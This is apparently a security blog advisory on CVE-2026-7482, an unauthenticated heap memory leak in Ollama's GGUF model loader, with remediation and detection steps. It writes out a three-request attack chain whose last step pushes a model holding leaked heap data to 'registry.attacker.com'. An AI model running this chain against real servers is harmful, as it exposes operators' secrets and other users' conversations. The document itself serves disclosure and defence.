CVE-2026-7482: Bleeding Llama — Critical Unauthenticated Memory Leak in Ollama

How Bleeding Llama allows unauthenticated remote attackers to extract API keys, prompt histories, and environment secrets in 3 API calls.

AI server infrastructure representing Ollama vulnerability
📌
Security Roundup Series: Week of May 7, 2026 • 4 min read deep dive
🚨
Threat Intelligence & Technical Specs: CVE ID: CVE-2026-7482 Severity: CVSS 9.3 Status: Impacting 300,000 exposed Ollama servers Target Component: Ollama AI Runner API

This article is part of our Week of May 7, 2026 Security Roundup.

CVE-2026-7482, dubbed Bleeding Llama, is a critical heap out-of-bounds read vulnerability in Ollama — the popular open-source framework for running large language models locally. Discovered by Cyera Research and assigned a CVSS score of 9.3, it allows any unauthenticated attacker to extract sensitive heap data from approximately 300,000 internet-facing Ollama deployments using just three API calls.

Vulnerability Details

The flaw lives in Ollama's GGUF model loader, specifically in fs/ggml/gguf.go and server/quantization.go. When the server processes a GGUF file where the declared tensor offset and size exceed the file's actual length, the WriteTo() function reads past the allocated heap buffer during the quantization conversion process (F16 to F32).

Because the F16 to F32 conversion is lossless, every byte of leaked heap memory is preserved intact inside the resulting model file. The attacker then uses Ollama's built-in /api/push endpoint — which accepts arbitrary registry hostnames — to exfiltrate the data-poisoned model to an attacker-controlled registry.

Attack Chain (3 Unauthenticated API Calls)

# 1. Upload a malicious GGUF blob with mismatched tensor metadata
POST /api/blobs/sha256:<hash>
Content-Type: application/octet-stream
<malicious GGUF file>

# 2. Create a model — triggers quantization and heap overread
POST /api/create
{"name": "exploit-model", "modelfile": "FROM @sha256:<hash>"}

# 3. Exfiltrate the tainted model (with embedded heap data) to attacker registry
POST /api/push
{"name": "registry.attacker.com/leaked-model"}

The attack succeeds silently. Ollama logs no errors and the server does not crash, making detection difficult without dedicated monitoring of the /api/create and /api/push endpoints.

What Data Is Exposed

The leaked heap may contain: environment variables (including any secrets set at the OS level), API keys loaded into the process, system prompts from other currently loaded models, concurrent user conversation data from other sessions, and proprietary code or customer data flowing through AI workflows connected to Ollama.

Why It Stayed Hidden for Months

Cyera reported the vulnerability to Ollama on February 2, 2026. Ollama acknowledged and shipped a fix in version 0.17.1 on February 25 — but the release notes made no mention of a security fix, so many operators never knew they needed to upgrade. A CVE request to MITRE on March 2 went unanswered. Cyera escalated to Echo CNA, which assigned CVE-2026-7482 on April 28 and published it May 1. That is nearly three months during which the vulnerability was invisible to scanners, vulnerability feeds, and SBOM correlation tools.

This is exactly the failure mode OWASP Dependency-Track and SBOM-based monitoring is designed to catch — but only works when CVEs are assigned promptly and patch release notes are accurate.

Affected Versions

All Ollama versions before 0.17.1. The patch is included in Ollama 0.17.1 and later.

Remediation

# Check your current Ollama version
ollama --version

# Upgrade
curl -fsSL https://ollama.com/install.sh | sh

# Verify
ollama --version  # should show 0.17.1 or later

# Bind to localhost only (never expose to internet)
export OLLAMA_HOST=127.0.0.1

# If running via systemd, update the service
sudo systemctl edit ollama
# Add: Environment="OLLAMA_HOST=127.0.0.1"

# Rotate all secrets on previously exposed instances
# Check for unexpected pushes in logs
grep '/api/push' /var/log/ollama.log | grep -v '127.0.0.1'

Detection

Monitor /api/create and /api/push endpoints for requests originating from unexpected sources. Alert on any /api/push calls where the registry hostname is not your internal registry. If Ollama has been publicly accessible, assume heap data exposure and rotate all secrets — GitHub tokens, cloud provider credentials, API keys, and any other secrets present in the server's environment.


References: Cyera Research disclosure | Echo CVE-2026-7482 | SecurityWeek coverage | runZero analysis


Read more

Brecha de Datos Médicos en Photon Health

Filtración en Photon Health: Zero-Day de Inyección SQL en Metabase Expone Recetas Médicas de Pacientes

📌Security Roundup Series: Semana del 9 de Octubre de 2026 • 4 min read deep dive🏛️Incident Overview: Target / Organization: Photon Health, Inc. (Plataforma de Prescripción Médica Digital) Threat Actor / Attribution: Actor Desconocido (Extorsión Financiera) Impact / Records Compromised: Nombres de pacientes, direcciones, números de teléfono, fechas de nacimiento, recetas médicas completas

By James Luther